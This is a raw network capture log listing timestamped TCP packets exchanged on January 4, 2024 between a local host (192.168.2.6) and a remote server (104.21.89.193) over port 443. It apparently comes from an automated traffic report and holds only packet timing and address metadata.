                                                                                    Jan 4, 2024 08:30:02.390737057 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.391235113 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.391251087 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.590187073 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.592245102 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.592271090 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236388922 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236434937 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236464977 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236509085 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.236521006 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236536980 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236562967 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.236592054 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236628056 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236630917 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.236637115 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236671925 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.236677885 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236743927 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.236778975 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.236783981 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.279476881 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.279484987 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.326343060 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.438055992 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438110113 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438129902 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438157082 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.438167095 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438193083 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438208103 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.438213110 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438252926 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.438483000 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438740015 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438771963 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.438776970 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438812971 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.438848972 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.438853025 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.439327002 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.439369917 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.439373016 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.439403057 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.439429998 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.439440012 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.439444065 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.439477921 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.439481020 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.440193892 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.440237999 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.440242052 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.440360069 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.440382957 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.440392017 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.440396070 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.440426111 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.440480947 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.482708931 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.482722044 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.529517889 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.641297102 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.641361952 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.641381025 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.641467094 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.641489029 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.641535997 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.641573906 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.641663074 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.641669035 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.641720057 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.641725063 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.642230988 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.642283916 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.642288923 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.642324924 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.642571926 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.642622948 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.643024921 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.643071890 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.643074036 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.643084049 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.643115044 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.643996954 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.644053936 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.644078970 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.644120932 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.644969940 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.645020008 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.645024061 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.645035028 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.645064116 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.645796061 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.645844936 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.645854950 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.645894051 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.646687031 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.646718979 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.646733046 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.646739006 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.646776915 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.847944975 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.848089933 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.848216057 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.848216057 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.848236084 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.848285913 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.848433971 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.848481894 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.848701954 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.848771095 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.849848032 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.849901915 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.850121021 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.850178003 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.850532055 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.850583076 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.850684881 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.850733995 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.851211071 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.851265907 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.851547956 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.851602077 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.852030039 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.852083921 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.852349043 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.852396965 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.852935076 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.852982998 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.853142023 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.853194952 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.853830099 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.853878021 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.853944063 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.853990078 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.854315042 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.854362965 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.854876041 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.854923964 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.855119944 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.855169058 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.855794907 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.855844021 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.855997086 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.856041908 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.856673002 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.856729031 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.856884003 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.856935024 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.857508898 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.857616901 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.857731104 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.857786894 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.857902050 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.857964039 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.858791113 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.858860016 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:03.858957052 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:03.859016895 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.049556017 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.049570084 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.049602032 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.049647093 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.049663067 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.049691916 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.049711943 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.051614046 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.051630974 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.051687956 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.051693916 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.051738977 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.052634954 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.052668095 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.052696943 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.052700996 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.052728891 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.052735090 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.052956104 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.053002119 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.053385019 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.053435087 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.053812027 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.053868055 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.054480076 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.054531097 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.054601908 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.054656029 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.055651903 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.055702925 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.055921078 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.055970907 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.056456089 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.056504011 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.057188988 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.057239056 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.057745934 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.057801962 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.058084965 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.058132887 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.059056997 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.059122086 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.059125900 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.059922934 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.059973001 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.059978962 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.060077906 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.060127974 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.060132980 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.060168028 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.060895920 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.060955048 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.061331987 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.061386108 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.061827898 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.061872959 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.062058926 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.062103987 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.062267065 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.062316895 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.063035011 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.063081980 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.063460112 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.063513041 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.064074039 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.064124107 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.064222097 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.064274073 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.065002918 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.065052986 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.065829039 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.065884113 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.065888882 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.067652941 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.067679882 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.067707062 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.067712069 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.067745924 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.069036961 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.069052935 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.069089890 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.069096088 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.069122076 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.069133997 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.070983887 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.071010113 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.071037054 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.071041107 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.071069002 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.071086884 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.071815968 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.071867943 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.071877003 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.071891069 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.071927071 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.252221107 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.252327919 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.252506971 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.252562046 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.252913952 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.252963066 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.253420115 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.253474951 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.253484964 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.253523111 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.254143953 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.254189968 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.254837036 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.254889965 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.255084038 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.255134106 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.255845070 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.255909920 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.256947041 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.257002115 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.257008076 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.258615971 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.258630991 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.258671999 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.258677006 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.258707047 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.260514975 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.260529995 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.260593891 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.260600090 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.260634899 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.260835886 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.260885954 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.261671066 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.261723042 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.262129068 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.262177944 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.262660980 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.262712002 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.263295889 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.263346910 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.263484001 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.263534069 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.264370918 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.264426947 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.266201973 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.266217947 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.266274929 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.266279936 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.266293049 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.266635895 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.266696930 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.266700983 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.266743898 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.267193079 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.267242908 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.267450094 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.267507076 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.269071102 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.269084930 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.269182920 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.269188881 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.273818970 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.273840904 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.273896933 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.273905993 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.273911953 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.273940086 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.273964882 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:04.274213076 CET44349719104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:04.274246931 CET44349719104.21.89.193192.168.2.6
